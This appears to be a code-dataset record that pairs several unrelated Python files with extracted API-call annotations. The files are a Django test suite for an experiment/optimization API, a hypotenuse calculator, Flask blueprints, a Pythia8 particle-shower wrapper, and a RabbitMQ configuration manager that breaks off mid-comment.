[((352, 374), 'dayu_widgets.qt.Signal', 'Signal', (['object', 'object'], {}), '(object, object)\n', (358, 374), False, 'from dayu_widgets.qt import QThread, Signal\n'), ((400, 408), 'dayu_widgets.qt.Signal', 'Signal', ([], {}), '()\n', (406, 408), False, 'from dayu_widgets.qt import QThread, Signal\n'), ((1192, 1208), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1206, 1208), False, 'import threading\n'), ((1653, 1684), 'strack_api.strack.Strack', 'Strack', (['url', 'username', 'password'], {}), '(url, username, password)\n', (1659, 1684), False, 'from strack_api.strack import Strack\n'), ((2179, 2201), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (2199, 2201), False, 'import traceback\n')]
|
'''
This is the test file.
'''
from django.test import TestCase, SimpleTestCase
from django.test import Client
from django.test import tag
from django.urls import reverse
import os
import subprocess
import signal
import multiprocessing
import time
import requests
import argparse
# -------Some Configurations-------
# Paths to test file
TSV_ZIP_PATH = 'test_files/test_opt.zip'
MODEL_DIR = 'test_files/model/'
TSV_DIR = 'test_files/tsv/'
HTML_DIR = 'test_files/output/html/'
# After each testcase, output http response status if set'True'
OUTPUT_STATUS = True
# After each testcase, output http response json data if set'True'
OUTPUT_JSON = True
# After each experiment, save html of figure into loacl file if set'True'
OUTPUT_HTML = True
# Global variable for naming html file
TIME_STAMP = ''
# Test API for experiment
class TestExperiment(TestCase):
# Open output html file:
@classmethod
def setUpClass(cls):
global TIME_STAMP
TIME_STAMP = time.strftime("%Y_%m_%d_%H:%M:%S", time.localtime())
@classmethod
def tearDownClass(cls):
print('-------Testing experiments finished-------')
# Output necessary info;
# Check if there is errors.
def handle_response(self,response):
self.assertEqual('', response.json()['error'])
# Output some info
if OUTPUT_STATUS:
print('Status: '+str(response.status_code))
if OUTPUT_JSON:
print(response.json())
if OUTPUT_HTML:
self.html_file.write(response.json()['figure'])
# According to tsv_path and model_path,
# send REST request django.test.Client
def send_request(self, tsv_path, model_path):
# 1.Set data
contents = {
"username": "unittest",
'tsv_file': open(tsv_path, 'rb'),
'model_file': open(model_path, 'rb')
}
# 2. Send REST request, get response
response = self.test_client.post(self.test_url, contents)
return response
# 1.Build django.test.Client for sending REST requests.
# 2.Get utl using django.urls.reverse().
# 3.Open html file for writing figures.
def setUp(self):
# build client
self.test_client = Client()
# set url
self.test_url = reverse('experiment-list')
# Open file
html_path = TIME_STAMP + '.html'
html_path = os.path.join(HTML_DIR, html_path)
self.html_file = open(html_path,"a")
# Close html file.
def tearDown(self):
self.html_file.close()
@tag('BC','experiment')
def test_experiment_BC(self):
""" Test experiment. Type: BarChart """
# bc_ratio_sb8.tsv
tsv = os.path.join(TSV_DIR, 'bc_ratio_sb8.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
@tag('DP','experiment')
def test_experiment_DP(self):
""" Test experiment. Type: DirectParameter """
# dp_Kd_tau.tsv
tsv = os.path.join(TSV_DIR, 'dp_Kd_tau.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
# dp.tsv
tsv = os.path.join(TSV_DIR, 'dp.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
@tag('DR','experiment')
def test_experiment_DR(self):
""" Test experiment. Type: DoseResponse """
# dr_ratio_b2c.tsv
tsv = os.path.join(TSV_DIR, 'dr_ratio_b2c.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
# dr_j2c.tsv
tsv = os.path.join(TSV_DIR, 'dr_j2c.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
@tag('TS','experiment')
def test_experiment_TS(self):
""" Test experiment. Type: TimeSeries """
# iclamp_hh13.tsv
tsv = os.path.join(TSV_DIR, 'iclamp_hh13.tsv')
model = os.path.join(MODEL_DIR, 'loadhh.py')
r = self.send_request(tsv,model)
self.handle_response(r)
# vclamp_hh.tsv
tsv = os.path.join(TSV_DIR, 'vclamp_hh.tsv')
model = os.path.join(MODEL_DIR, 'loadhh.py')
r = self.send_request(tsv,model)
self.handle_response(r)
# ts_j4d.tsv
tsv = os.path.join(TSV_DIR, 'ts_j4d.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
# ts_norm_m3b.tsv
tsv = os.path.join(TSV_DIR, 'ts_norm_m3b.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
# ts_ratio_t2a.tsv
tsv = os.path.join(TSV_DIR, 'ts_ratio_t2a.tsv')
model = os.path.join(MODEL_DIR, 'synSynth7.g')
r = self.send_request(tsv,model)
self.handle_response(r)
'''
Testing files are following:
BarChart:
bc_ratio_sb8.tsv synSynth7.g
DirectParameter:
dp_Kd_tau.tsv synSynth7.g
dp.tsv synSynth7.g
DoseResponse:
dr_j2c.tsv synSynth7.g
dr_ratio_b2c.tsv synSynth7.g
TimeSeries:
iclamp_hh13.tsv loadhh.py
ts_j4d.tsv synSynth7.g
ts_norm_m3b.tsv synSynth7.g
ts_ratio_t2a.tsv synSynth7.g
vclamp_hh.tsv loadhh.py
'''
# Test API for optimizatin
class TestOptimization(TestCase):
# Output necessary info;
# Check if there is errors.
def handle_response(self,response):
if OUTPUT_STATUS:
print('Status: '+str(response.status_code))
if OUTPUT_JSON:
print(response.json())
self.assertEqual('', response.json()['error'])
# According to tsv_path and model_path,
# send REST request django.test.Client
def send_request(self, n_p, trl, tsv_path, model_path):
# 1.Set data
contents = {
"username": "unittest",
"num_processes": n_p,
"tolerance": trl,
'tsv_files': open(tsv_path, 'rb'),
'model_file': open(model_path, 'rb')
}
# 2. Send REST request, get response
response = self.test_client.post(self.test_url, contents)
return response
# 1.Build django.test.Client for sending REST requests
# 2. Get url using django.urls.reverse().
def setUp(self):
# build client
self.test_client = Client()
# set url
self.test_url = reverse('optimization-list')
# With num_processes as '1'
@tag('optimization')
def test_single_process(self):
""" Test optimization request: multi processes """
tsvs = TSV_ZIP_PATH
model = os.path.join(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')
r = self.send_request(1, 0.8, tsvs, model)
self.handle_response(r)
# With num_processes more than '1'
@tag('optimization')
def test_multi_process(self):
""" Test optimization request: single process """
tsvs = TSV_ZIP_PATH
model = os.path.join(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')
r = self.send_request(6, 0.6, tsvs, model)
self.handle_response(r)
# django.SimpleTestCase is guaranteed to be ran after django.TestCase
# This class is for printing info after tests.
class TestFinishing(SimpleTestCase):
@tag('TS','BC','DR','DP','experiment')
def test_finishing_experiments(self):
print('-------TestCases finished-------')
html_path = TIME_STAMP + '.html'
html_path = os.path.join(HTML_DIR, html_path)
if OUTPUT_HTML:
print('==================================================Notice==================================================')
print('||')
print('|| You can find figures in ', html_path)
print('||')
print('==========================================================================================================')
|
[
"django.test.Client",
"django.urls.reverse",
"django.test.tag",
"os.path.join",
"time.localtime"
] |
[((2542, 2565), 'django.test.tag', 'tag', (['"""BC"""', '"""experiment"""'], {}), "('BC', 'experiment')\n", (2545, 2565), False, 'from django.test import tag\n'), ((2864, 2887), 'django.test.tag', 'tag', (['"""DP"""', '"""experiment"""'], {}), "('DP', 'experiment')\n", (2867, 2887), False, 'from django.test import tag\n'), ((3378, 3401), 'django.test.tag', 'tag', (['"""DR"""', '"""experiment"""'], {}), "('DR', 'experiment')\n", (3381, 3401), False, 'from django.test import tag\n'), ((3903, 3926), 'django.test.tag', 'tag', (['"""TS"""', '"""experiment"""'], {}), "('TS', 'experiment')\n", (3906, 3926), False, 'from django.test import tag\n'), ((6680, 6699), 'django.test.tag', 'tag', (['"""optimization"""'], {}), "('optimization')\n", (6683, 6699), False, 'from django.test import tag\n'), ((7017, 7036), 'django.test.tag', 'tag', (['"""optimization"""'], {}), "('optimization')\n", (7020, 7036), False, 'from django.test import tag\n'), ((7468, 7509), 'django.test.tag', 'tag', (['"""TS"""', '"""BC"""', '"""DR"""', '"""DP"""', '"""experiment"""'], {}), "('TS', 'BC', 'DR', 'DP', 'experiment')\n", (7471, 7509), False, 'from django.test import tag\n'), ((2219, 2227), 'django.test.Client', 'Client', ([], {}), '()\n', (2225, 2227), False, 'from django.test import Client\n'), ((2270, 2296), 'django.urls.reverse', 'reverse', (['"""experiment-list"""'], {}), "('experiment-list')\n", (2277, 2296), False, 'from django.urls import reverse\n'), ((2378, 2411), 'os.path.join', 'os.path.join', (['HTML_DIR', 'html_path'], {}), '(HTML_DIR, html_path)\n', (2390, 2411), False, 'import os\n'), ((2688, 2729), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""bc_ratio_sb8.tsv"""'], {}), "(TSV_DIR, 'bc_ratio_sb8.tsv')\n", (2700, 2729), False, 'import os\n'), ((2746, 2784), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (2758, 2784), False, 'import os\n'), ((3014, 3052), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""dp_Kd_tau.tsv"""'], {}), "(TSV_DIR, 'dp_Kd_tau.tsv')\n", (3026, 3052), False, 'import os\n'), ((3069, 3107), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (3081, 3107), False, 'import os\n'), ((3212, 3243), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""dp.tsv"""'], {}), "(TSV_DIR, 'dp.tsv')\n", (3224, 3243), False, 'import os\n'), ((3260, 3298), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (3272, 3298), False, 'import os\n'), ((3528, 3569), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""dr_ratio_b2c.tsv"""'], {}), "(TSV_DIR, 'dr_ratio_b2c.tsv')\n", (3540, 3569), False, 'import os\n'), ((3586, 3624), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (3598, 3624), False, 'import os\n'), ((3733, 3768), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""dr_j2c.tsv"""'], {}), "(TSV_DIR, 'dr_j2c.tsv')\n", (3745, 3768), False, 'import os\n'), ((3785, 3823), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (3797, 3823), False, 'import os\n'), ((4050, 4090), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""iclamp_hh13.tsv"""'], {}), "(TSV_DIR, 'iclamp_hh13.tsv')\n", (4062, 4090), False, 'import os\n'), ((4107, 4143), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""loadhh.py"""'], {}), "(MODEL_DIR, 'loadhh.py')\n", (4119, 4143), False, 'import os\n'), ((4255, 4293), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""vclamp_hh.tsv"""'], {}), "(TSV_DIR, 'vclamp_hh.tsv')\n", (4267, 4293), False, 'import os\n'), ((4310, 4346), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""loadhh.py"""'], {}), "(MODEL_DIR, 'loadhh.py')\n", (4322, 4346), False, 'import os\n'), ((4455, 4490), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""ts_j4d.tsv"""'], {}), "(TSV_DIR, 'ts_j4d.tsv')\n", (4467, 4490), False, 'import os\n'), ((4507, 4545), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (4519, 4545), False, 'import os\n'), ((4659, 4699), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""ts_norm_m3b.tsv"""'], {}), "(TSV_DIR, 'ts_norm_m3b.tsv')\n", (4671, 4699), False, 'import os\n'), ((4716, 4754), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (4728, 4754), False, 'import os\n'), ((4869, 4910), 'os.path.join', 'os.path.join', (['TSV_DIR', '"""ts_ratio_t2a.tsv"""'], {}), "(TSV_DIR, 'ts_ratio_t2a.tsv')\n", (4881, 4910), False, 'import os\n'), ((4927, 4965), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""synSynth7.g"""'], {}), "(MODEL_DIR, 'synSynth7.g')\n", (4939, 4965), False, 'import os\n'), ((6562, 6570), 'django.test.Client', 'Client', ([], {}), '()\n', (6568, 6570), False, 'from django.test import Client\n'), ((6613, 6641), 'django.urls.reverse', 'reverse', (['"""optimization-list"""'], {}), "('optimization-list')\n", (6620, 6641), False, 'from django.urls import reverse\n'), ((6838, 6888), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""Gs_To_PKA_31_May_2019.g"""'], {}), "(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')\n", (6850, 6888), False, 'import os\n'), ((7173, 7223), 'os.path.join', 'os.path.join', (['MODEL_DIR', '"""Gs_To_PKA_31_May_2019.g"""'], {}), "(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g')\n", (7185, 7223), False, 'import os\n'), ((7660, 7693), 'os.path.join', 'os.path.join', (['HTML_DIR', 'html_path'], {}), '(HTML_DIR, html_path)\n', (7672, 7693), False, 'import os\n'), ((1009, 1025), 'time.localtime', 'time.localtime', ([], {}), '()\n', (1023, 1025), False, 'import time\n')]
|
from math import hypot
print("{:=^25}".format(" DESAFIO 017 "))
print("{:=^25}".format(" Cálculo da hipotenusa "), end="\n\n")
opposite_leg = float(input("Comprimento do cateto oposto: "))
adjacent_leg = float(input("Comprimento do cateto adjacente: "))
# hypotenuse = ((opposite_leg ** 2) + (adjacent_leg ** 2)) ** (1/2)
hypotenuse = hypot(opposite_leg, adjacent_leg)
print("Com o CO igual a {} e CA {} a hipotenusa equivale a {:.2f}".format(opposite_leg, adjacent_leg, hypotenuse))
|
[
"math.hypot"
] |
[((338, 371), 'math.hypot', 'hypot', (['opposite_leg', 'adjacent_leg'], {}), '(opposite_leg, adjacent_leg)\n', (343, 371), False, 'from math import hypot\n')]
|
from flask import Blueprint
bp_location = Blueprint('location', __name__, template_folder="templates", url_prefix='/location')
from .views.location import *
bp_entity = Blueprint('entity', __name__, template_folder="templates", url_prefix='/entity')
from .views.entity import *
|
[
"flask.Blueprint"
] |
[((43, 132), 'flask.Blueprint', 'Blueprint', (['"""location"""', '__name__'], {'template_folder': '"""templates"""', 'url_prefix': '"""/location"""'}), "('location', __name__, template_folder='templates', url_prefix=\n '/location')\n", (52, 132), False, 'from flask import Blueprint\n'), ((171, 256), 'flask.Blueprint', 'Blueprint', (['"""entity"""', '__name__'], {'template_folder': '"""templates"""', 'url_prefix': '"""/entity"""'}), "('entity', __name__, template_folder='templates', url_prefix='/entity'\n )\n", (180, 256), False, 'from flask import Blueprint\n')]
|
"""
``showerpipe.generator``
=====================
The ShowerPipe Generator module provides a standardised Pythonic
interface to showering and hadronisation programs.
Data is generated using Python iterator objects, and provided in
NumPy arrays.
Notes
-----
The classes provided here are concrete implementations of the abstract
GeneratorAdapter class. Currently only PythiaGenerator has been
implemented, however this module may be extended with additional
concrete implementations of GeneratorAdapter. Future versions are
planned to include HerwigGenerator and AriadneGenerator interfaces.
"""
import os
import tempfile
import shutil
from functools import cached_property
from typing import Optional
import numpy as np
from typicle import Types # type: ignore
from showerpipe._base import GeneratorAdapter
from showerpipe import _dataframe
from showerpipe.lhe import count_events, source_adapter, _LHE_STORAGE
class PythiaGenerator(GeneratorAdapter):
"""Wrapper of Pythia8 generator. Provides an iterator over
successive showered events, whose properties expose the data
generated via NumPy arrays.
Parameters
----------
config_file : str
Path to Pythia .cmnd configuration file.
me_file : Pathlike, string, or bytes
The variable or filepath containing the LHE data. May be a path,
string, or bytes object. If file, may be compressed with gzip.
rng_seed : int
Seed passed to the random number generator used by Pythia.
types : typicle.Types
Data container defining the types of the output physics data.
Returns
-------
out : iterator
Upon iteration a new particle shower is triggered, whose data
is accessible via the following properties:
edges : ndarray
Edge list representing generation ancestry of the event
as a directed acyclic graph.
Provided in a structured array, with fields 'in', 'out'.
pmu : ndarray
Four momentum provided in a structured array, with
fields 'x', 'y', 'z', 'e'.
pdg : ndarray
Particle Data Group identity codes for each particle.
color : ndarray
Color / anticolor pairs for each particle, provided
in a structured array with fields 'color', 'anticolor'.
final : ndarray
Mask over the particle list, to extract only those in
their final state.
"""
import pythia8 as __pythia_lib
import pandas as __pd
def __init__(
self,
config_file: str,
me_file: Optional[_LHE_STORAGE] = None,
rng_seed: int = 1,
types: Types = Types()
):
self.xml_dir = os.environ['PYTHIA8DATA']
pythia = self.__pythia_lib.Pythia(
xmlDir=self.xml_dir, printBanner=False)
pythia.readFile(config_file)
pythia.readString("Print:quiet = on")
pythia.readString("Random:setSeed = on")
pythia.readString(f"Random:seed = {rng_seed}")
if me_file is not None:
self.__num_events = count_events(me_file)
with source_adapter(me_file) as lhe_file:
self.temp_me_file = tempfile.NamedTemporaryFile()
shutil.copyfileobj(lhe_file, self.temp_me_file)
self.temp_me_file.seek(0)
me_path = self.temp_me_file.name
pythia.readString("Beams:frameType = 4")
pythia.readString(f"Beams:LHEF = {me_path}")
pythia.init()
pmu_type = types.pmu[0][1]
color_type = types.color[0][1]
edge_type = types.edge[0][1]
self.__types = {
'pdg': types.pdg,
'final': types.final,
'x': pmu_type,
'y': pmu_type,
'z': pmu_type,
'e': pmu_type,
'color': color_type,
'anticolor': color_type,
'in': edge_type,
'out': edge_type,
'status': types.h_int,
'helicity': types.h_int,
}
self.__pythia = pythia
def __iter__(self):
return self
def __len__(self):
try:
return self.__num_events
except AttributeError:
raise NotImplementedError(
'Length only defined when initialised with LHE file.')
def __next__(self):
if self.__pythia is None:
raise RuntimeError("Pythia generator not initialised.")
is_next = self.__pythia.next()
if not is_next:
if hasattr(self, 'temp_me_file'):
self.temp_me_file.close()
raise StopIteration("No more events left to be showered.")
if self.__event_df is not None:
del self.__event_df
if self.count is not None:
del self.count
return self
@cached_property
def __event_df(self) -> __pd.DataFrame:
def sorted_tuple(iterable):
list_object = list(iterable)
list_object.sort()
return tuple(list_object)
event_df = self.__pd.DataFrame(
map(lambda pcl: {
'index': pcl.index(),
'pdg': pcl.id(),
'final': pcl.isFinal(),
'x': pcl.px(),
'y': pcl.py(),
'z': pcl.pz(),
'e': pcl.e(),
'color': pcl.col(),
'status': pcl.status(),
'helicity': pcl.pol(),
'anticolor': pcl.acol(),
'parents': sorted_tuple(pcl.motherList()),
}, self.__pythia.event),
)
event_df = event_df.set_index('index')
event_df = event_df[event_df['pdg'] != 90]
vertex_df = _dataframe.vertex_df(event_df)
event_df = _dataframe.add_edge_cols(event_df, vertex_df)
event_df = event_df.drop(columns=['parents'])
event_df = event_df.astype(self.__types, copy=False)
event_df['out'] *= -1
event_df['in'] *= -1
return event_df
@cached_property
def count(self) -> int:
"""The number of particles in the event."""
return len(self.__event_df)
@property
def edges(self) -> np.ndarray:
return _dataframe.df_to_struc(self.__event_df[['in', 'out']])
@property
def pmu(self) -> np.ndarray:
return _dataframe.df_to_struc(self.__event_df[['x', 'y', 'z', 'e']])
@property
def color(self) -> np.ndarray:
return _dataframe.df_to_struc(self.__event_df[['color', 'anticolor']])
@property
def pdg(self) -> np.ndarray:
return self.__event_df['pdg'].values
@property
def final(self) -> np.ndarray:
return self.__event_df['final'].values
@property
def helicity(self) -> np.ndarray:
"""The polarisation of the particles. Particles without a
polarisation (or where it is unknown) have a value of 9.
"""
return self.__event_df['helicity'].values
@property
def status(self) -> np.ndarray:
"""Pythia-specific status codes. See link for details.
https://pythia.org/latest-manual/ParticleProperties.html
"""
return self.__event_df['status'].values
|
[
"tempfile.NamedTemporaryFile",
"typicle.Types",
"showerpipe._dataframe.df_to_struc",
"showerpipe.lhe.source_adapter",
"showerpipe._dataframe.vertex_df",
"showerpipe.lhe.count_events",
"shutil.copyfileobj",
"showerpipe._dataframe.add_edge_cols"
] |
[((2755, 2762), 'typicle.Types', 'Types', ([], {}), '()\n', (2760, 2762), False, 'from typicle import Types\n'), ((5927, 5957), 'showerpipe._dataframe.vertex_df', '_dataframe.vertex_df', (['event_df'], {}), '(event_df)\n', (5947, 5957), False, 'from showerpipe import _dataframe\n'), ((5977, 6022), 'showerpipe._dataframe.add_edge_cols', '_dataframe.add_edge_cols', (['event_df', 'vertex_df'], {}), '(event_df, vertex_df)\n', (6001, 6022), False, 'from showerpipe import _dataframe\n'), ((6424, 6478), 'showerpipe._dataframe.df_to_struc', '_dataframe.df_to_struc', (["self.__event_df[['in', 'out']]"], {}), "(self.__event_df[['in', 'out']])\n", (6446, 6478), False, 'from showerpipe import _dataframe\n'), ((6542, 6603), 'showerpipe._dataframe.df_to_struc', '_dataframe.df_to_struc', (["self.__event_df[['x', 'y', 'z', 'e']]"], {}), "(self.__event_df[['x', 'y', 'z', 'e']])\n", (6564, 6603), False, 'from showerpipe import _dataframe\n'), ((6669, 6732), 'showerpipe._dataframe.df_to_struc', '_dataframe.df_to_struc', (["self.__event_df[['color', 'anticolor']]"], {}), "(self.__event_df[['color', 'anticolor']])\n", (6691, 6732), False, 'from showerpipe import _dataframe\n'), ((3169, 3190), 'showerpipe.lhe.count_events', 'count_events', (['me_file'], {}), '(me_file)\n', (3181, 3190), False, 'from showerpipe.lhe import count_events, source_adapter, _LHE_STORAGE\n'), ((3208, 3231), 'showerpipe.lhe.source_adapter', 'source_adapter', (['me_file'], {}), '(me_file)\n', (3222, 3231), False, 'from showerpipe.lhe import count_events, source_adapter, _LHE_STORAGE\n'), ((3281, 3310), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {}), '()\n', (3308, 3310), False, 'import tempfile\n'), ((3327, 3374), 'shutil.copyfileobj', 'shutil.copyfileobj', (['lhe_file', 'self.temp_me_file'], {}), '(lhe_file, self.temp_me_file)\n', (3345, 3374), False, 'import shutil\n')]
|
import fnmatch
import logging
import os
import sys
import threading
import time
from configparser import (ConfigParser, DuplicateSectionError,
DuplicateOptionError, InterpolationError,
ParsingError)
from datetime import datetime
from types import FrameType
from typing import List, Optional, Callable
import pika
from pika.adapters.blocking_connection import BlockingChannel
from pika.exceptions import AMQPChannelError, AMQPConnectionError
from watchdog.events import FileSystemEvent
from watchdog.observers.polling import PollingObserver
from src.abstract.publisher_subscriber import \
QueuingPublisherSubscriberComponent
from src.message_broker.rabbitmq import RabbitMQApi
from src.utils import env
from src.utils import routing_key
from src.utils.constants.rabbitmq import (
CONFIG_EXCHANGE, HEALTH_CHECK_EXCHANGE, CONFIGS_MANAGER_HEARTBEAT_QUEUE,
PING_ROUTING_KEY, HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY, TOPIC)
from src.utils.constants.starters import RE_INITIALISE_SLEEPING_PERIOD
from src.utils.exceptions import (MessageWasNotDeliveredException,
ConnectionNotInitialisedException)
from .config_update_event_handler import ConfigFileEventHandler
from ..utils.logging import log_and_print
_FIRST_RUN_EVENT = 'first run'
class ConfigsManager(QueuingPublisherSubscriberComponent):
"""
This class reads all configurations and sends them over to the "config"
topic in Rabbit MQ. Updated configs are sent as well
"""
def __init__(self, name: str, logger: logging.Logger, config_directory: str,
rabbit_ip: str, file_patterns: Optional[List[str]] = None,
ignore_file_patterns: Optional[List[str]] = None,
ignore_directories: bool = True, case_sensitive: bool = False):
"""
Constructs the ConfigsManager instance
:param config_directory: The root config directory to watch.
This is searched recursively.
:param file_patterns: The file patterns in the directory to watch.
Defaults to all ini files
:param ignore_file_patterns: Any file patterns to ignore.
Defaults to None
:param ignore_directories: Whether changes in directories should be
ignored. Default: True
:param case_sensitive: Whether the patterns in `file_patterns` and
`ignore_file_patterns` are case sensitive. Defaults to False
"""
if not file_patterns:
file_patterns = ['*.ini']
self._name = name
self._config_directory = config_directory
self._file_patterns = file_patterns
self._watching = False
self._connected_to_rabbit = False
self._current_thread = None
logger.debug("Creating config RabbitMQ connection")
rabbitmq = RabbitMQApi(
logger.getChild("config_{}".format(RabbitMQApi.__name__)),
host=rabbit_ip)
super().__init__(logger, rabbitmq,
env.CONFIG_PUBLISHING_QUEUE_SIZE)
self._logger.debug("Creating heartbeat RabbitMQ connection")
self._heartbeat_rabbit = RabbitMQApi(
logger.getChild("heartbeat_{}".format(RabbitMQApi.__name__)),
host=rabbit_ip)
self._event_handler = ConfigFileEventHandler(
self._logger.getChild(ConfigFileEventHandler.__name__),
self._on_event_thrown,
file_patterns,
ignore_file_patterns,
ignore_directories,
case_sensitive
)
self._observer = PollingObserver()
self._observer.schedule(self._event_handler, config_directory,
recursive=True)
def __str__(self) -> str:
return self.name
@property
def name(self) -> str:
return self._name
def _initialise_rabbitmq(self) -> None:
while True:
try:
self._connect_to_rabbit()
self._logger.info("Connected to Rabbit")
self.rabbitmq.confirm_delivery()
self._logger.info("Enabled delivery confirmation on configs"
"RabbitMQ channel")
self.rabbitmq.exchange_declare(
CONFIG_EXCHANGE, TOPIC, False, True, False, False
)
self._logger.info("Declared %s exchange in Rabbit",
CONFIG_EXCHANGE)
self._heartbeat_rabbit.confirm_delivery()
self._logger.info("Enabled delivery confirmation on heartbeat"
"RabbitMQ channel")
self._heartbeat_rabbit.exchange_declare(
HEALTH_CHECK_EXCHANGE, TOPIC, False, True, False, False
)
self._logger.info("Declared %s exchange in Rabbit",
HEALTH_CHECK_EXCHANGE)
self._logger.info(
"Creating and binding queue '%s' to exchange '%s' with "
"routing key '%s", CONFIGS_MANAGER_HEARTBEAT_QUEUE,
HEALTH_CHECK_EXCHANGE, PING_ROUTING_KEY)
self._heartbeat_rabbit.queue_declare(
CONFIGS_MANAGER_HEARTBEAT_QUEUE, False, True, False, False)
self._logger.debug("Declared '%s' queue",
CONFIGS_MANAGER_HEARTBEAT_QUEUE)
self._heartbeat_rabbit.queue_bind(
CONFIGS_MANAGER_HEARTBEAT_QUEUE, HEALTH_CHECK_EXCHANGE,
PING_ROUTING_KEY)
self._logger.debug("Bound queue '%s' to exchange '%s'",
CONFIGS_MANAGER_HEARTBEAT_QUEUE,
HEALTH_CHECK_EXCHANGE)
# Pre-fetch count is set to 300
prefetch_count = round(300)
self._heartbeat_rabbit.basic_qos(prefetch_count=prefetch_count)
self._logger.debug("Declaring consuming intentions")
self._heartbeat_rabbit.basic_consume(
CONFIGS_MANAGER_HEARTBEAT_QUEUE, self._process_ping, True,
False, None)
break
except (ConnectionNotInitialisedException,
AMQPConnectionError) as connection_error:
# Should be impossible, but since exchange_declare can throw
# it we shall ensure to log that the error passed through here
# too.
self._logger.error(
"Something went wrong that meant a connection was not made")
self._logger.error(connection_error)
raise connection_error
except AMQPChannelError:
# This error would have already been logged by the RabbitMQ
# logger and handled by RabbitMQ. As a result we don't need to
# anything here, just re-try.
time.sleep(RE_INITIALISE_SLEEPING_PERIOD)
def _connect_to_rabbit(self) -> None:
if not self._connected_to_rabbit:
self._logger.info("Connecting to the config RabbitMQ")
self.rabbitmq.connect_till_successful()
self._logger.info("Connected to config RabbitMQ")
self._logger.info("Connecting to the heartbeat RabbitMQ")
self._heartbeat_rabbit.connect_till_successful()
self._logger.info("Connected to heartbeat RabbitMQ")
self._connected_to_rabbit = True
else:
self._logger.info(
"Already connected to RabbitMQ, will not connect again")
def disconnect_from_rabbit(self) -> None:
if self._connected_to_rabbit:
self._logger.info("Disconnecting from the config RabbitMQ")
self.rabbitmq.disconnect_till_successful()
self._logger.info("Disconnected from the config RabbitMQ")
self._logger.info("Disconnecting from the heartbeat RabbitMQ")
self._heartbeat_rabbit.disconnect_till_successful()
self._logger.info("Disconnected from the heartbeat RabbitMQ")
self._connected_to_rabbit = False
else:
self._logger.info("Already disconnected from RabbitMQ")
def _send_heartbeat(self, data_to_send: dict) -> None:
self._logger.debug("Sending heartbeat to the %s exchange",
HEALTH_CHECK_EXCHANGE)
self._logger.debug("Sending %s", data_to_send)
self._heartbeat_rabbit.basic_publish_confirm(
exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_WORKER_ROUTING_KEY, body=data_to_send,
is_body_dict=True, properties=pika.BasicProperties(delivery_mode=2),
mandatory=True)
self._logger.debug("Sent heartbeat to %s exchange",
HEALTH_CHECK_EXCHANGE)
def _process_ping(self, ch: BlockingChannel,
method: pika.spec.Basic.Deliver,
properties: pika.spec.BasicProperties,
body: bytes) -> None:
self._logger.debug("Received %s. Let's pong", body)
try:
heartbeat = {
'component_name': self.name,
'is_alive': self._observer.is_alive(),
'timestamp': datetime.now().timestamp(),
}
self._send_heartbeat(heartbeat)
except MessageWasNotDeliveredException as e:
# Log the message and do not raise it as heartbeats must be
# real-time
self._logger.error("Error when sending heartbeat")
self._logger.exception(e)
def _on_event_thrown(self, event: FileSystemEvent) -> None:
"""
When an event is thrown, it reads the config and sends it as a dict via
rabbitmq to the config exchange of type topic
with the routing key determined by the relative file path.
:param event: The event passed by watchdog
:return None
"""
self._logger.debug("Event thrown: %s", event)
self._logger.info("Detected a config %s in %s", event.event_type,
event.src_path)
if event.event_type == "deleted":
self._logger.debug("Creating empty dict")
config_dict = {}
else:
config = ConfigParser()
self._logger.debug("Reading configuration")
try:
config.read(event.src_path)
except (
DuplicateSectionError, DuplicateOptionError,
InterpolationError, ParsingError
) as e:
self._logger.error(e.message)
# When the config is invalid, we do nothing and discard this
# event.
return None
self._logger.debug("Config read successfully")
config_dict = {key: dict(config[key]) for key in config}
self._logger.debug("Config converted to dict: %s", config_dict)
# Since the watcher is configured to watch files in
